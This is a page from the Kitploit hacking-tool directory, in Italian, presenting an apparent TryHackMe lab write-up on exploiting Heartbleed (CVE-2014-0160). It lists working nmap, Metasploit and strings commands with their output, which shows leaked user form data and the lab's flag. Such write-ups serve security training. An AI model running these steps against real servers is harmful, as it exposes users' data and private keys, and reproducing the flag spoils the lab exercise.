Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — L'obiettivo di questo progetto era valutare un host remoto per la vulnerabilità Heartbleed (CVE-2014-0160), verificarne la presenza e sfruttarla per estrarre informazioni potenzialmente sensibili dalla memoria del server tramite il protocollo TLS. | Kitploit
Strumenti/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
Memory ForensicsAnalisi delle VulnerabilitàExploitRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

L'obiettivo di questo progetto era valutare un host remoto per la vulnerabilità Heartbleed (CVE-2014-0160), verificarne la presenza e sfruttarla per estrarre informazioni potenzialmente sensibili dalla memoria del server tramite il protocollo TLS.

Vedi Repository
151 anno faNon ancora revisionato

Obiettivo L'obiettivo di questo progetto era valutare un host remoto per la vulnerabilità Heartbleed (CVE-2014-0160), verificarne la presenza e sfruttarla per estrarre potenziali informazioni sensibili dalla memoria del server tramite il protocollo TLS.

Esecuzione

  1. Identificazione dei servizi aperti (Nmap) nmap -sC -sV 52.215.184.158 Risultato:

plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 Il certificato TLS era autofirmato e scaduto. Ciò ha fatto sospettare che la versione di OpenSSL potesse essere obsoleta. Porta target: 443.

  1. Verifica della vulnerabilità Heartbleed (Script Nmap) nmap -p 443 --script ssl-heartbleed 52.215.184.158 Risultato:

plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 Il target è confermato vulnerabile a Heartbleed.

  1. Sfruttamento (Metasploit Framework) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run Risultato:

plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin La memoria è stata scaricata con successo e salvata localmente per l'analisi.

  1. Analisi del dump di memoria

strings openssl.heartble_152689.bin | grep -i "THM{" Risultato:

plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} Dati riservati, incluso un flag dell'applicazione, sono stati estratti con successo dalla memoria TLS — confermando che la vulnerabilità può essere sfruttata praticamente per divulgare informazioni sensibili.

Conclusione Ho identificato e sfruttato con successo CVE-2014-0160 su un server remoto. Il processo ha incluso:

Rilevamento della vulnerabilità con nmap

Sfruttamento della falla usando Metasploit

Estrazione di dati utente inviati in tempo reale (incluso il flag THM{sSl-Is-BaD}) dalla memoria

Impatto Aziendale La presenza di Heartbleed in un sistema esposto pubblicamente rappresenta un rischio critico:

Potenziale divulgazione delle chiavi private TLS

Hijacking di sessione

Esposizione di nomi utente, email e input utente sensibili

Scarica lo strumento